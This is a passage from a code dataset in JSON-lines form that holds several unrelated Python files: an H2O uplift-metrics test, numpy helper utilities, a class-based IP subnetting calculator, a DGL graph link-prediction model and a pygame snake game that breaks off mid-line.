{}\".format(m2.auuc()))\n print(\"thresholds: {}\".format(m2.thresholds()))\n print(\"Make AUUC with custom thresholds from m1: {}\".format(m3.auuc()))\n print(\"thresholds: {}\".format(m3.thresholds()))\n print(\"Make AUUC with custom thresholds from model defaults: {}\".format(m4.auuc()))\n print(\"thresholds: {}\".format(m4.thresholds()))\n print(\"Make AUUC with no custom thresholds but change nbins parameter: {}\".format(m5.auuc()))\n print(\"thresholds: {}\".format(m5.thresholds()))\n\n tol = 1e-5\n\n # default model auuc is calculated from train data, default thresholds are from validation data\n assert abs(model.auuc() - m0.auuc()) > tol\n # model performance calculates new thresholds but from the same data with the same number of bins, so AUUCs are same\n assert abs(m0.auuc() - m1.auuc()) < tol\n # make method calculates new thresholds but from the same data with the same number of bins, so AUUCs are same\n assert abs(m1.auuc() - m2.auuc()) < tol\n # if we use thresholds from performance metric and use it as custom, it makes the same metrics\n assert abs(m1.auuc() - m3.auuc()) < tol\n # make methods with different nbins parameter changes thresholds and AUUC\n assert abs(m3.auuc() - m5.auuc()) > tol\n\n print(\"===========================\")\n\n\ndef suite_model_metrics():\n\n def test_model_metrics_basic():\n pyunit_make_metrics()\n\n def test_model_metrics_weights():\n pyunit_make_metrics(weights_col=\"weights\")\n\n def test_model_metrics_uplift():\n pyunit_make_metrics_uplift()\n\n return [\n test_model_metrics_basic,\n test_model_metrics_weights,\n test_model_metrics_uplift\n ]\n\n\npyunit_utils.run_tests([\n suite_model_metrics()\n])\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_misc/pyunit_make_metrics.py","file_name":"pyunit_make_metrics.py","file_ext":"py","file_size_in_byte":13259,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"738479285","text":"__author__ = 'IntelligentSystem'\n\n\nimport numpy as np\n\n\ndef find_closest(array, target):\n #a must be sorted\n idx = array.searchsorted(target)\n idx = np.clip(idx, 1, len(array)-1)\n left = array[idx-1]\n right = array[idx]\n idx -= target - left < right - target\n return idx\n\n\ndef normList(L, normalizeFrom=0, normalizeTo=1):\n '''normalize values of a list to make its min = normalizeFrom and its max = normalizeTo'''\n vMax = max(L)\n vMin = min(L)\n return [(x-vMin)*(normalizeTo - normalizeFrom) / (vMax - vMin) for x in L]\n\n\ndef normList(L, normalizeFrom=0, normalizeTo=1, vMin=None, vMax=None):\n '''normalize values of a list to make its min = normalizeFrom and its max = normalizeTo'''\n if vMax:\n _vMax = vMax\n else:\n _vMax = max(L)\n\n if vMin:\n _vMin = vMin\n else:\n _vMin = min(L)\n\n return [(x-_vMin)*(normalizeTo - normalizeFrom) / (_vMax - _vMin) for x in L]\n\n\ndef nested_change(item, func):\n if isinstance(item, list):\n return [nested_change(x, func) for x in item]\n return func(item)\n\n\ndef find_points_in_array_with_jitter(array_of_points_to_be_found, array_to_search, jitter_around_each_point):\n found_points_in_aoptbf = []\n indices_of_found_points_in_aoptbf = []\n indices_of_found_points_in_searched_array = []\n prev_points_added = 0\n curr_points_added = 0\n not_found_points_in_aoptbf = []\n for index_of_aoptbf in np.arange(len(array_of_points_to_be_found)):\n point_to_be_found = array_of_points_to_be_found[index_of_aoptbf]\n for possible_point in np.arange(point_to_be_found - jitter_around_each_point,\n point_to_be_found + jitter_around_each_point):\n indices_of_possible_point_in_searched_array = np.where(array_to_search == possible_point)[0]\n if len(indices_of_possible_point_in_searched_array) != 0:\n found_points_in_aoptbf.append(array_to_search[indices_of_possible_point_in_searched_array[0]])\n indices_of_found_points_in_aoptbf.append(index_of_aoptbf)\n indices_of_found_points_in_searched_array.append(indices_of_possible_point_in_searched_array[0])\n curr_points_added += 1\n break\n if curr_points_added > prev_points_added:\n prev_points_added = curr_points_added\n else:\n not_found_points_in_aoptbf.append(point_to_be_found)\n print('Points found in array = ' + str(np.shape(found_points_in_aoptbf)[0]))\n print('Percentage = ' + str(100 * (np.shape(found_points_in_aoptbf)[0] / len(array_of_points_to_be_found))) + '% found')\n return found_points_in_aoptbf, indices_of_found_points_in_aoptbf, indices_of_found_points_in_searched_array, not_found_points_in_aoptbf\n","repo_name":"georgedimitriadis/themeaningofbrain","sub_path":"BrainDataAnalysis/Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"35467699943","text":"'''\nSubnetting :\n\nWith Class C subnet mask\nInput from user- A) Enter the any / (slash) notation (/24 to /30) of the IPv4 subnet mask\nOutput to be displayed on the terminal/console:\nShow the output on the terminal/console for the following:\n1) Subnet mask for entered / (slash) notation of the IPv4 subnet mask\n2) The maximum number of subnets\n3) Valid host address per subnet\n\nInput from user-\nB) Enter the valid IP address. (Input from user-User has to type on terminal/console)\nOutput to be displayed on the terminal/console:\nShow the output on the terminal/console for the following\n1) The Network Id and Broadcast address for each subnet.\n2) Show the valid host address range with starting and ending addresses.\n\n'''\n\ndef getClassSubNet(classId):\n\tif classId == 'A':\n\t\treturn [255, 0, 0, 0]\n\telif classId == 'B':\n\t\treturn [255, 255, 0, 0]\n\telif classId == 'C':\n\t\treturn [255, 255, 255, 0]\n\ndef getClassSubNetForHost(classId):\n\tif classId == 'A':\n\t\treturn [0, 255, 255, 255]\n\telif classId == 'B':\n\t\treturn [0, 0, 255, 255]\n\telif classId == 'C':\n\t\treturn [0, 0, 0, 255]\n\ndef doAnding(list1, list2):\n\tlist3 = []\n\tfor i in range(len(list1)):\n\t\tlist3.append(list1[i] & list2[i])\n\treturn list3\n\ndef getClass(data):\n\tif data[0] >= 0 and data[0] <= 127: #A\n\t\treturn 'A'\n\telif data[0] >=128 and data[0] <= 191: #B\n\t\treturn 'B'\n\telif data[0] >= 192 and data[0] <= 223: #C\n\t\treturn 'C'\n\telif data[0] >= 224 and data[0] <= 239: #D\n\t\treturn 'D'\n\telif data[0] >= 240 and data[0] <= 255: #E\n\t\treturn 'E'\n\telse:\n\t\treturn \"DN\"\n\ndef getNetworkID(data):\n\tclassName = getClass(data)\n\tif className in ['D', 'E']:\n\t\treturn \"Dont have Nework Dividation\"\n\telif className == 'DN':\n\t\treturn \"Dont Know\"\n\treturn doAnding(data, getClassSubNet(className))\n\ndef getHostID(data):\n\tclassName = getClass(data)\n\tif className in ['D', 'E']:\n\t\treturn \"Dont have Nework Dividation\"\n\telif className == 'DN':\n\t\treturn \"Dont Know\"\n\treturn doAnding(data, getClassSubNetForHost(className))\n\ndef getStringOutOf(data):\n\tst = \"\"\n\tfor ele in data:\n\t\tst += str(ele)\n\t\tst += '.'\n\treturn st[:-1]\n\ndef getBroadCastAddress(chunks):\n\tchunks = getNetworkID(chunks)\n\tfor i in range(len(chunks)):\n\t\tif chunks[i] == 0:\n\t\t\tchunks[i] = 255\n\treturn chunks\n\ndef getMaskFromSlashNotation(data):\n\tchunks = []\n\twhile data > 8:\n\t\tchunks.append(int('1' * 8, 2))\n\t\tdata -= 8\n\tif data != 0:\n\t\ta = '1' * data\n\t\tif len(a) != 8:\n\t\t\ta += \"0\" * (8 - len(a))\n\t\tchunks.append(int(a, 2))\n\n\twhile len(chunks) != 4:\n\t\tchunks.append(0)\n\treturn chunks\n\n#For Class C\ndef getMaxSubnet(data):\n\treturn pow(2, 24 - data)\n\n#For Class C\ndef getMaxHost(data):\n\treturn pow(2, 32 - data) - 2\n\npart = input(\"Select The Part : \")\nif part == 'A':\n\tprint(\"Part - A\")\n\tdata = str(input(\"Enter the slash Notation Value : \"))\n\tdata = int(data.split('/')[1])\n\tmask = getMaskFromSlashNotation(data)\n\tprint(\"Sub Net Mask : \", getStringOutOf(mask))\n\tprint(\"Max SubNets : \", getMaxSubnet(data))\n\tprint(\"Max Hosts : \", getMaxHost(data))\nelif part == 'B':\n\tprint(\"Part - B\")\n\tdata = str(input(\"Enter the Ip Address : \"))\n\tchunks = [int(d) for d in data.split('.')]\n\tif len(chunks) != 4:\n\t\tprint(\"Invlaid IP ..!!\")\n\telse:\n\t\tprint(\"Network Id Is : \", getStringOutOf(getNetworkID(chunks)))\n\t\tprint(\"BroadCast Address Is : \", getStringOutOf(getBroadCastAddress(chunks)))\n\t\tprint(\"Host Id Is : \", getStringOutOf(getHostID(chunks)))\n\t\tprint(\"Host Range Is Starting From : \", getStringOutOf(chunks), \" Upto : \" , getStringOutOf(getBroadCastAddress(chunks)), \" Exclude First And Last Address.\")\nelse:\n\tprint(\"Invalid Choice ..!!\")\n\n","repo_name":"sanskarjamadar/CN_Problems","sub_path":"Problem 2/problem 2.py","file_name":"problem 2.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24072023481","text":"'''Learning-based method for link prediction'''\n\n__author__ = 'Wenjin Deng'\n\nimport pandas as pd\nimport os\nimport dgl\nimport dgl.function as fn\nimport dgl.nn.pytorch as dglnn\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport networkx as nx\nimport random\n\n''' global args '''\nA_path = './A_similarity.csv'\nB_path = './B_similarity.csv'\nA_B_path = './A_B_adjacent.csv'\nembed_dim = 256\nmid_dim = 1024\nout_dim = 512\nhidden_edges = 4 # 4,8,16,32,64\nmax_epoch = 200\nneg_node_num = 16 # neg node sample num\nrebuild_graph = False\navg_cnt = 3\ndevice=torch.device(\"cpu\")\n\n# if torch.cuda.is_available():\n# device=torch.device(\"cuda\")\n\ndef get_heterograph_items(data_path, mode, threshold=0.75):\n \"\"\"\n This function is used to get edge pairs.\n\n Parameters:\n data_path - Str. graph csv file path\n mode - Str. Valid values are 'self' and 'correlation'. \n Use 'self' for normalizing and discretizing edge score, further picking edge where score is 1\n Use 'correlation' for directly picking edge where score is 1\n threshold - Float. edge score = 0 if input < threshold, else 1\n\n Returns:\n src - List. Left nodes of Edges\n dst - List. Right nodes of Edges\n rows_name_list - List. csv rows name\n cols_name_list - List. csv cols name\n\n Note:\n src contains duplicate elements, and must be subset of rows_name_list. \n It's also true for pair (dst, cols_name_list).\n \"\"\"\n assert mode in ['self', 'correlation']\n # 1. read csv\n matrix = pd.read_csv(data_path)\n # 2. get rows name and cols name\n rows_name_list = matrix[matrix.columns.tolist()[0]].tolist()\n cols_name_list = matrix.columns.tolist()[1:]\n \n src = []\n dst = []\n\n # 3. store node pair of edges to src and dst\n if mode == 'self':\n min_value = min([matrix[name].min() for name in cols_name_list])\n max_value = max([matrix[name].max() for name in cols_name_list])\n for idx, row in matrix.iterrows():\n # print(idx)\n # print(row)\n for name in cols_name_list:\n # 1. normalization (set value to 0-1)\n # 2. discretization (round)\n # item_val = round(float(row[name])/(max_value-min_value))\n item_val = 0 if float(row[name])/(max_value-min_value) < threshold else 1\n # 3. record\n if item_val == 1:\n src.append(rows_name_list[idx])\n dst.append(name)\n else:\n for idx, row in matrix.iterrows():\n for name in cols_name_list:\n # 3. record\n if int(row[name]) == 1:\n src.append(rows_name_list[idx])\n dst.append(name)\n \n return src, dst, rows_name_list, cols_name_list\n\n# Define a Heterograph Conv model\nclass RGCN(nn.Module):\n \"\"\"\n copy from dgl offical docs\n \"\"\"\n def __init__(self, in_feats, hid_feats, out_feats, rel_names):\n super().__init__()\n # 实例化HeteroGraphConv,in_feats是输入特征的维度,out_feats是输出特征的维度,aggregate是聚合函数的类型\n self.conv1 = dglnn.HeteroGraphConv({\n rel: dglnn.GraphConv(in_feats, hid_feats)\n for rel in rel_names}, aggregate='sum')\n self.conv2 = dglnn.HeteroGraphConv({\n rel: dglnn.GraphConv(hid_feats, out_feats)\n for rel in rel_names}, aggregate='sum')\n\n def forward(self, graph, inputs):\n # 输入是节点的特征字典\n h = self.conv1(graph, inputs)\n h = {k: F.relu(v) for k, v in h.items()}\n h = self.conv2(graph, h)\n return h\n \n# Define a Heterograph DotProduct Predictor\nclass HeteroDotProductPredictor(nn.Module):\n \"\"\"\n copy from dgl offical docs\n \"\"\"\n def forward(self, graph, h, etype):\n # h是从5.1节中对异构图的每种类型的边所计算的节点表示\n with graph.local_scope():\n graph.ndata['h'] = h\n graph.apply_edges(fn.u_dot_v('h', 'h', 'score'), etype=etype)\n return graph.edges[etype].data['score']\n\n# Define a method to construct negative graph \ndef construct_negative_graph(graph, k, etype):\n \"\"\"\n copy from dgl offical docs\n \"\"\"\n utype, _, vtype = etype\n src, dst = graph.edges(etype=etype)\n neg_src = src.repeat_interleave(k)\n neg_dst = torch.randint(0, graph.num_nodes(vtype), (len(src) * k,))\n return dgl.heterograph(\n {etype: (neg_src, neg_dst)},\n num_nodes_dict={ntype: graph.num_nodes(ntype) for ntype in graph.ntypes})\n\n# Define a method to normalize node embedding vector\ndef norm_node_embedding(node_h):\n \"\"\"\n normalize node vector\n \"\"\"\n node_h['A'] = F.normalize(node_h['A'], p=2, dim=1)\n node_h['B'] = F.normalize(node_h['B'], p=2, dim=1)\n return node_h\n\n# Define a model\nclass Model(nn.Module):\n \"\"\"\n refer from dgl offical docs\n \"\"\"\n def __init__(self, in_features, hidden_features, out_features, rel_names):\n super().__init__()\n self.sage = RGCN(in_features, hidden_features, out_features, rel_names)\n self.pred = HeteroDotProductPredictor()\n def forward(self, g, neg_g, x, etype):\n h = self.sage(g, x)\n h = norm_node_embedding(h) # if not use this, edge score will be out of range [-1,1]\n return self.pred(g, h, etype), self.pred(neg_g, h, etype)\n\n# Define a loss\ndef compute_loss(pos_score, neg_score):\n \"\"\"\n copy from dgl offical docs\n \"\"\"\n # 间隔损失\n n_edges = pos_score.shape[0]\n return (1 - pos_score.unsqueeze(1) + neg_score.view(n_edges, -1)).clamp(min=0).mean()\n\n# train \ndef train(hetero_graph, max_epoch, embed_dim, mid_dim, out_dim, hidden_edges):\n # 1. prepare nodes embedding\n A_embed = nn.Embedding(hetero_graph.number_of_nodes('A'), embed_dim)\n B_embed = nn.Embedding(hetero_graph.number_of_nodes('B'), embed_dim)\n A_edge_embed = nn.Embedding(hetero_graph.number_of_edges('A_self'), embed_dim)\n B_edge_embed = nn.Embedding(hetero_graph.number_of_edges('B_self'), embed_dim)\n AB_edge_embed = nn.Embedding(hetero_graph.number_of_edges('A_and_B'), embed_dim)\n hetero_graph.nodes['A'].data['feat'] = A_embed.weight\n hetero_graph.nodes['B'].data['feat'] = B_embed.weight\n hetero_graph.edges['A_self'].data['feat'] = A_edge_embed.weight\n hetero_graph.edges['B_self'].data['feat'] = B_edge_embed.weight\n hetero_graph.edges['A_and_B'].data['feat'] = AB_edge_embed.weight\n hetero_graph.to(device)\n\n node_features = {'A': hetero_graph.nodes['A'].data['feat'], 'B': hetero_graph.nodes['B'].data['feat']}\n\n # 2. instancing a model\n model = Model(embed_dim, mid_dim, out_dim, hetero_graph.etypes).to(device)\n model.train()\n \n # 3. prepare an optimizer\n opt = torch.optim.Adam(model.parameters())\n\n # 4 training schedule\n for epoch in range(max_epoch):\n negative_graph = construct_negative_graph(hetero_graph, neg_node_num, ('A', 'A_and_B', 'B'))\n pos_score, neg_score = model(hetero_graph, negative_graph, node_features, ('A', 'A_and_B', 'B'))\n loss = compute_loss(pos_score, neg_score)\n opt.zero_grad()\n loss.backward()\n opt.step()\n print(f'training {epoch+1}//{max_epoch}\\tloss:{loss.item()}')\n # print(pos_score.shape[0]) # edges num\n return model\n\n# eval\ndef eval(model, hidden_graph):\n with torch.no_grad():\n model.eval()\n # 1. prepare nodes embedding\n src_embed = nn.Embedding(hidden_graph.number_of_nodes('A'), embed_dim)\n dst_embed = nn.Embedding(hidden_graph.number_of_nodes('B'), embed_dim)\n hidden_graph.nodes['A'].data['feat'] = src_embed.weight\n hidden_graph.nodes['B'].data['feat'] = dst_embed.weight\n hidden_graph.to(device)\n hidden_node = {'A':hidden_graph.nodes['A'].data['feat'], 'B':hidden_graph.nodes['B'].data['feat']}\n\n # 2. infer to obtain score list of hidden edges\n node_h = model.sage(hidden_graph, hidden_node)\n node_h = norm_node_embedding(node_h)\n score = model.pred(hidden_graph, node_h, ('A', 'A_and_B', 'B'))\n score = score.numpy()\n # print(score)\n print('src\\tdst\\tscore')\n valid_cnt = 0\n for idx, zip_item in enumerate(zip(AB_src_hid,AB_dst_hid)):\n src,dst = zip_item\n if score[idx][0]>0:\n valid_cnt += 1\n print(f'{src}\\t{dst}\\t{score[idx][0]}')\n print(f'Pr@k (k={len(AB_src_hid)}): {valid_cnt/len(AB_src_hid)}')\n return valid_cnt/len(AB_src_hid)\n\nif __name__== \"__main__\":\n avg_score = 0\n\n for _ in range(avg_cnt):\n # 1. prepare items for graph\n A_src, A_dst, A_rows_name_list, A_cols_name_list = get_heterograph_items(A_path, 'self')\n B_src, B_dst, B_rows_name_list, B_cols_name_list = get_heterograph_items(B_path, 'self')\n AB_src, AB_dst, AB_rows_name_list, AB_cols_name_list = get_heterograph_items(A_B_path, 'correlation')\n\n # 2. trans node name to dict for unique id\n A_full_dict={}\n B_full_dict={}\n for id,name in enumerate(AB_rows_name_list):\n A_full_dict.update({name: id})\n for id,name in enumerate(AB_cols_name_list):\n B_full_dict.update({name: id})\n\n\n # 3. randomly hide edge\n if rebuild_graph:\n print('rebuild graph task')\n AB_src_hid = AB_src\n AB_dst_hid = AB_dst\n else:\n print('link prediction task')\n print('random hid...')\n hid_pair = random.sample(range(len(AB_src)), hidden_edges)\n AB_src_hid = []\n AB_dst_hid = []\n AB_src_rest = []\n AB_dst_rest = []\n for idx,zip_item in enumerate(zip(AB_src,AB_dst)):\n src, dst = zip_item\n if idx in hid_pair:\n AB_src_hid.append(src)\n AB_dst_hid.append(dst)\n else:\n AB_src_rest.append(src)\n AB_dst_rest.append(dst)\n\n # 4. build rest heterograph (rest = origin - hidden)\n if rebuild_graph:\n hetero_graph = dgl.heterograph(\n {\n ('A', 'A_self', 'A') : ([A_full_dict['A_'+str(name)] for name in A_src], [A_full_dict['A_'+str(name)] for name in A_dst]),\n ('B', 'B_self', 'B') : ([B_full_dict['B_'+str(name)] for name in B_src], [B_full_dict['B_'+str(name)] for name in B_dst]),\n ('A', 'A_and_B', 'B') : ([A_full_dict[name] for name in AB_src],[B_full_dict[name] for name in AB_dst])\n }\n )\n else:\n hetero_graph = dgl.heterograph(\n {\n ('A', 'A_self', 'A') : ([A_full_dict['A_'+str(name)] for name in A_src], [A_full_dict['A_'+str(name)] for name in A_dst]),\n ('B', 'B_self', 'B') : ([B_full_dict['B_'+str(name)] for name in B_src], [B_full_dict['B_'+str(name)] for name in B_dst]),\n ('A', 'A_and_B', 'B') : ([A_full_dict[name] for name in AB_src_rest],[B_full_dict[name] for name in AB_dst_rest])\n }\n )\n\n print('training grapha\\n', hetero_graph)\n # print(hetero_graph.number_of_nodes())\n # print(hetero_graph.number_of_edges())\n\n # 5. train\n model = train(hetero_graph, max_epoch, embed_dim, mid_dim, out_dim, hidden_edges)\n \n # 6. build hidden graph with hidden edges\n if rebuild_graph:\n hidden_graph = hetero_graph\n else:\n hidden_graph = dgl.heterograph(\n {\n ('A', 'A_self', 'A') : ([A_full_dict['A_'+str(name)] for name in A_src], [A_full_dict['A_'+str(name)] for name in A_dst]),\n ('B', 'B_self', 'B') : ([B_full_dict['B_'+str(name)] for name in B_src], [B_full_dict['B_'+str(name)] for name in B_dst]),\n ('A', 'A_and_B', 'B') : ([A_full_dict[name] for name in AB_src_hid],[B_full_dict[name] for name in AB_dst_hid])\n }\n )\n print('eval grapha\\n', hidden_graph)\n\n # 7. eval\n final_score = eval(model, hidden_graph)\n\n avg_score += final_score\n \n print(f'avg_{avg_cnt}: {avg_score/avg_cnt}')\n","repo_name":"WinstonDeng/LinkPrediction","sub_path":"learning_based.py","file_name":"learning_based.py","file_ext":"py","file_size_in_byte":12392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74148683394","text":"import pygame\r\nimport random\r\nimport pandas as pd\r\n\r\n\r\n# classes\r\nclass Player:\r\n global screen_size_x\r\n global screen_size_y\r\n\r\n def __init__(self):\r\n self.width = 10\r\n self.height = 10\r\n self.x = 100\r\n self.y = 40\r\n self.move = 10\r\n self.direction = 5\r\n self.speed = 100\r\n\r\n def movement(self):\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_UP] \\\r\n and self.y >= self.height \\\r\n and self.direction != 1\\\r\n and self.direction != 6:\r\n self.direction = 0\r\n elif keys[pygame.K_DOWN] \\\r\n and self.y <= screen_size_y - 2 * self.height \\\r\n and self.direction != 0\\\r\n and self.direction != 6:\r\n self.direction = 1\r\n elif keys[pygame.K_LEFT] \\\r\n and self.x >= self.width \\\r\n and self.direction != 3\\\r\n and self.direction != 6:\r\n self.direction = 2\r\n elif keys[pygame.K_RIGHT] \\\r\n and self.x <= screen_size_x - 2 * self.width \\\r\n and self.direction != 2\\\r\n and self.direction != 6:\r\n self.direction = 3\r\n\r\n if self.direction == 0 \\\r\n and self.y >= self.height:\r\n self.y -= self.move\r\n elif self.direction == 1 \\\r\n and self.y <= screen_size_y - 2 * self.height:\r\n self.y += self.move\r\n elif self.direction == 2 \\\r\n and self.x >= self.width:\r\n self.x -= self.move\r\n elif self.direction == 3 \\\r\n and self.x <= screen_size_x - 2 * self.width:\r\n self.x += self.move\r\n\r\n def snake_head(self):\r\n pygame.draw.rect(screen, black,\r\n (self.x, self.y, snake.width, snake.height))\r\n\r\n\r\nclass Food:\r\n def __init__(self):\r\n self.x = random.randrange(1, 47) * 10\r\n self.y = random.randrange(1, 47) * 10\r\n self.width = 10\r\n self.height = 10\r\n\r\n def display_food(self):\r\n pygame.draw.rect(screen, red,\r\n (self.x, self.y, self.width, self.height))\r\n\r\n\r\nclass Tail:\r\n def __init__(self):\r\n self.x = 10\r\n self.y = 10\r\n\r\n def new_tail(self):\r\n for i in game.snake_lst:\r\n pygame.draw.rect(screen, snake_body_color,\r\n (i[0], i[1], self.x, self.y))\r\n\r\n\r\nclass Game:\r\n global screen_size_x\r\n global screen_size_y\r\n\r\n def __init__(self):\r\n self.score_count = 0\r\n self.snake_lst = []\r\n self.snake_len = 0\r\n self.running = True\r\n self.snake_head = []\r\n self.flag = 0\r\n\r\n def menu(self):\r\n while self.running:\r\n pygame.time.delay(100)\r\n screen.fill(white)\r\n menu_page()\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n self.running = False\r\n pygame.display.update()\r\n\r\n def exit_game(self):\r\n self.flag = 0\r\n self.running = False\r\n score_board()\r\n\r\n def restart(self):\r\n self.flag = 0\r\n self.running = True\r\n score_board()\r\n while self.running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n self.running = False\r\n snake.speed = 100\r\n self.score_count = 0\r\n self.snake_lst = []\r\n self.snake_len = 0\r\n self.snake_head = []\r\n game.gameloop()\r\n pygame.display.update()\r\n\r\n def gameloop(self):\r\n snake.x = 140\r\n snake.y = 60\r\n snake.direction = 5\r\n while self.running:\r\n screen.fill(black)\r\n screen.blit(back_ground_game, (0, 0))\r\n pygame.time.delay(snake.speed)\r\n tail.new_tail()\r\n snake.snake_head()\r\n food.display_food()\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n screen.fill(black)\r\n self.running = False\r\n\r\n pygame.time.get_ticks()\r\n self.snake_head = [snake.x, snake.y]\r\n self.snake_lst.append(self.snake_head)\r\n snake.movement()\r\n\r\n if snake.x == food.x \\\r\n and snake.y == food.y:\r\n food.x = random.randrange(1, 47) * 10\r\n food.y = random.randrange(1, 47) * 10\r\n snake.speed -= 1\r\n self.score_count += 1\r\n self.snake_len += 1\r\n if self.snake_len % 5 == 0:\r\n snake.speed -= 2\r\n value = main_font.render(\"Score: \" + str(self.score_count), True, grey)\r\n screen.blit(value, [10, 0])\r\n\r\n if len(self.snake_lst) > self.snake_len:\r\n del self.snake_lst[0]\r\n\r\n # game over for those terms:\r\n for i in self.snake_lst[1:]:\r\n if self.snake_lst[0] == i:\r\n game_over()\r\n snake.direction = 6\r\n\r\n if snake.x == 0 \\\r\n or snake.y == 0 \\\r\n or snake.x == screen_size_x - 10 \\\r\n or snake.y == screen_size_y - 10:\r\n game_over()\r\n pygame.display.update()\r\n\r\n\r\ndef score_board_menu():\r\n score_board_df()\r\n global high_score\r\n while game.running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n game.running = False\r\n pygame.mouse.set_visible(True)\r\n screen.fill(white)\r\n screen.blit(score_board_back_ground, (0, 125))\r\n score_board_font = font_over.render(\"Score Board\", False, black)\r\n screen.blit(score_board_font, (71, 40))\r\n first_name = high_score.iloc[0][0]\r\n second_name = high_score.iloc[1][0]\r\n third_name = high_score.iloc[2][0]\r\n first_score = str(high_score.iloc[0][1])\r\n second_score = str(high_score.iloc[1][1])\r\n third_score = str(high_score.iloc[2][1])\r\n first = main_font.render(first_name, False, white)\r\n screen.blit(first, (215, 320))\r\n second = main_font.render(second_name, False, white)\r\n screen.blit(second, (65, 380))\r\n third = main_font.render(third_name, False, white)\r\n screen.blit(third, (370, 390))\r\n first = main_font.render(first_score, False, white)\r\n screen.blit(first, (230, 360))\r\n second = main_font.render(second_score, False, white)\r\n screen.blit(second, (85, 420))\r\n third = main_font.render(third_score, False, white)\r\n screen.blit(third, (390, 435))\r\n button(blue, light_blue, 15, 3, 20, 0, 75, 40, \"Back\", \"back_to_menu\")\r\n button(light_red, red, 420, 3, 425, 0, 75, 40, \"Quit\", \"exit\")\r\n pygame.display.update()\r\n\r\n\r\ndef score_board_game_over():\r\n score_board_df()\r\n global high_score\r\n while game.running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n game.running = False\r\n pygame.mouse.set_visible(True)\r\n screen.fill(white)\r\n screen.blit(score_board_back_ground, (0, 125))\r\n score_board_font = font_over.render(\"Score Board\", False, black)\r\n screen.blit(score_board_font, (71, 40))\r\n first_name = high_score.iloc[0][0]\r\n second_name = high_score.iloc[1][0]\r\n third_name = high_score.iloc[2][0]\r\n first_score = str(high_score.iloc[0][1])\r\n second_score = str(high_score.iloc[1][1])\r\n third_score = str(high_score.iloc[2][1])\r\n first = main_font.render(first_name, False, white)\r\n screen.blit(first, (215, 320))\r\n second = main_font.render(second_name, False, white)\r\n screen.blit(second, (65, 380))\r\n third = main_font.render(third_name, False, white)\r\n screen.blit(third, (370, 390))\r\n first = main_font.render(first_score, False, white)\r\n screen.blit(first, (230, 360))\r\n second = main_font.render(second_score, False, white)\r\n screen.blit(second, (90, 410))\r\n third = main_font.render(third_score, False, white)\r\n screen.blit(third, (390, 435))\r\n button(blue, light_blue, 15, 3, 20, 0, 115, 40, \"Restart\", \"restart\")\r\n button(light_red, red, 420, 3, 425, 0, 75, 40, \"Quit\", \"exit\")\r\n pygame.display.update()\r\n\r\n\r\ndef game_over():\r\n if game.flag == 0:\r\n score_board()\r\n score_board_df()\r\n game.flag = 1\r\n screen.fill(white)\r\n pygame.mouse.set_visible(True)\r\n screen.blit(back_ground_end, (-40, -10))\r\n game_over_font = font_over.render(\"GameOver\", False, black)\r\n screen.blit(game_over_font, (180, 275))\r\n name = score_font.render(str(player_name) + \"'s\", False, black)\r\n screen.blit(name, (265, 0))\r\n score = score_font.render(\"Score: \" + str(game.score_count), False, black)\r\n screen.blit(score, (235, 45))\r\n author = small_font.render(\"Amit Sabban\", False, light_red)\r\n screen.blit(author, (30, 470))\r\n button(light_grey, grey, 247, 140, 255, 140, 190, 50, \"Score-Board\", \"score_board_game_over\")\r\n button(light_green, green, 280, 200, 285, 195, 115, 40, \"Restart\", \"restart\")\r\n button(light_red, red, 300, 250, 305, 245, 75, 35, \"Quit\", \"exit\")\r\n\r\n\r\ndef menu_page():\r\n score_board_df()\r\n pygame.mouse.set_visible(True)\r\n screen.blit(back_ground_menu, (0, 0))\r\n game_name = font_name.render(\"Snake\", False, black)\r\n screen.blit(game_name, (220, 10))\r\n author = small_font.render(\"Amit Sabban\", False, light_red)\r\n screen.blit(author, (30, 470))\r\n button(light_green, green, 272, 140, 278, 140, 145, 44, \"Play game\", \"name_box\")\r\n button(light_grey, grey, 250, 220, 255, 220, 190, 50, \"Score-Board\", \"score_board_menu\")\r\n button(light_red, red, 300, 300, 310, 300, 85, 50, \"Quit\", \"exit\")\r\n pygame.display.update()\r\n\r\n\r\ndef button(color1, color2, x, y, x_loc, y_loc, width, height, text='', action=None):\r\n mouse = pygame.mouse.get_pos()\r\n click = pygame.mouse.get_pressed()\r\n if x < mouse[0] < x + width and y < mouse[1] < y + height:\r\n pygame.draw.rect(screen, color2, (x, y, width, height))\r\n if click[0] == 1 and action is not None:\r\n if action == \"exit\":\r\n action = None\r\n game.exit_game()\r\n if action == \"name_box\":\r\n action = None\r\n name_box()\r\n if action == \"restart\":\r\n action = None\r\n game.restart()\r\n if action == \"back_to_menu\":\r\n action = None\r\n game.menu()\r\n if action == \"score_board_menu\":\r\n action = None\r\n score_board_menu()\r\n if action == \"score_board_game_over\":\r\n action = None\r\n score_board_game_over()\r\n else:\r\n pygame.draw.rect(screen, color1, (x, y, width, height))\r\n text = main_font.render(text, False, black)\r\n screen.blit(text, (x_loc, y_loc))\r\n\r\n\r\ndef name_box():\r\n global player_name\r\n name_screen = pygame.display.set_mode((screen_size_x, screen_size_y))\r\n input_box = pygame.Rect(150, 90, 140, 40)\r\n color = black\r\n active = True\r\n text = ''\r\n done = False\r\n while not done:\r\n for event in pygame.event.get():\r\n pygame.mouse.set_visible(False)\r\n if event.type == pygame.QUIT:\r\n done = True\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if input_box.collidepoint(event.pos):\r\n active = not active\r\n if event.type == pygame.KEYDOWN:\r\n if active:\r\n if event.key == pygame.K_RETURN:\r\n if text == \"\":\r\n player_name_2 = main_font.render(\"Please Enter Your Name:\", False, 